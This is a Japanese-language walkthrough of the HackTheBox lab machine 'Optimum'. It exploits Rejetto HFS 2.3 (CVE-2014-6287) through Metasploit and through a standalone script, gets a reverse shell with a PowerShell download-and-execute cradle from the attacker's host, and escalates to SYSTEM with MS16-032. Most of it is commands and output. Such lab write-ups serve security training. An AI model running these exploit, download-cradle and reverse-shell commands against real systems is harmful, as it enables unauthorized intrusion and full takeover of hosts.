😎
Optimum_HTB
概要
- Optimum は、既知のエクスプロイトを持つサービスの列挙に主に焦点を当てた初心者レベルのマシンです。 どちらのエクスプロイトも簡単に入手でき、Metasploit モジュールが関連付けられています。
SCAN
┌──(kali㉿kali)-[~/Optimum]
└─$ nmap -T4 -Pn -sV -sC 10.10.10.8
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-29 06:01 EST
Nmap scan report for 10.10.10.8
Host is up (0.25s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.89 seconds
Initial Access
- 公式Write Up 通りにとりあえずmsfconsoleで刺してみる。
msf6 > search cve:2014-6287
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
msf6 > use exploit/windows/http/rejetto_hfs_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.10.8rhost => 10.10.10.8
msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost 10.10.16.2lhost => 10.10.16.2
msf6 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.10.16.2:4444
[*] Using URL: http://10.10.16.2:8080/ItO77Cfstcbu
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /ItO77Cfstcbu
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\uFrIskMYSOxH.vbs' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.10.16.2:4444
[*] Using URL: http://10.10.16.2:8080/ikwLnccTo
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /ikwLnccTo
[*] Sending stage (175686 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\DlvjNW.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.16.2:4444 -> 10.10.10.8:49167) at 2023-12-28 23:31:32 -0500
[*] Server stopped.
meterpreter > getuid
Server username: OPTIMUM\kostas
meterpreter >
- 2回刺したら刺さった。
- 1回目の失敗原因は不明
これ以降うまくいかないのでやり直す
Initial Access
Invoke-PowerShellTcp.ps1を使用したReverseShell
- Invoke-PowerShellTcp.ps1
- このフォルダ上でpython待ち受け
python3 -m http.server 8080
- 別ターミナルでnc待ち受け
┌──(kali㉿kali)-[~/Optimum]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
- 更に別ターミナルで脆弱性に使用できる49125.pyを使用
- 32bitで動いていることを確認したので32bitを対策する。
┌──(kali㉿kali)-[~/Optimum]
└─$ python3 49125.py 10.10.10.8 80 "C:\WINDOWS\Sysnative\WindowsPowerShell\v1.0\powershell.exe iex(new-object net.webclient).downloadstring('http://10.10.16.4:8080/Invoke-PowerShellTcp.ps1')"
http://10.10.10.8:80/?search=%00{.+exec|C%3A%5CWINDOWS%5CSysnative%5CWindowsPowerShell%5Cv1.0%5Cpowershell.exe%20iex%28new-object%20net.webclient%29.downloadstring%28%27http%3A//10.10.16.4%3A8080/Invoke-PowerShellTcp.ps1%27%29.}
権限昇格
- Sherlock.ps1を使用した使用した脆弱性確認
- 全てを確認したいので追記
echo "Find-AllVulns" >> Sherlock.ps1
- 待ち受け
python3 -m http.server 8080
- 実行
PS C:\Users\kostas\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.16.2:8080/Sherlock.ps1')
Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable
Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable
Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable
Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable
Title : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable
PS C:\Users\kostas\Desktop>
Invoke-MS16032.ps1
- Invoke-MS16032.ps1を利用してSystem権限取得する。
# Invoke-MS16032.ps1があるディレクトリで待ち受け
┌──(kali㉿kali)-[~/Optimum/oscp_notes/MS16-032 drivers eop]
└─$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/)
# Invoke-PowerShellTcp.ps1の中身をリバースシェルとは違うportに書き換えて待ち受け
┌──(kali㉿kali)-[~/Optimum/nishang/Shells]
└─$ python3 -m http.server 3434
Serving HTTP on 0.0.0.0 port 3434 (http://0.0.0.0:3434/) ...
# リバースシェルを取ったターミナル
PS C:\Users\kostas\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.16.4:8080/Invoke-MS16032.ps1')
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[!] Holy handle leak Batman, we have a SYSTEM shell!!
## 待ち受けリバースシェル
```bash
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.8] 49183
Windows PowerShell running as user OPTIMUM$ on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\kostas\Desktop>whoami
nt authority\system
Discussion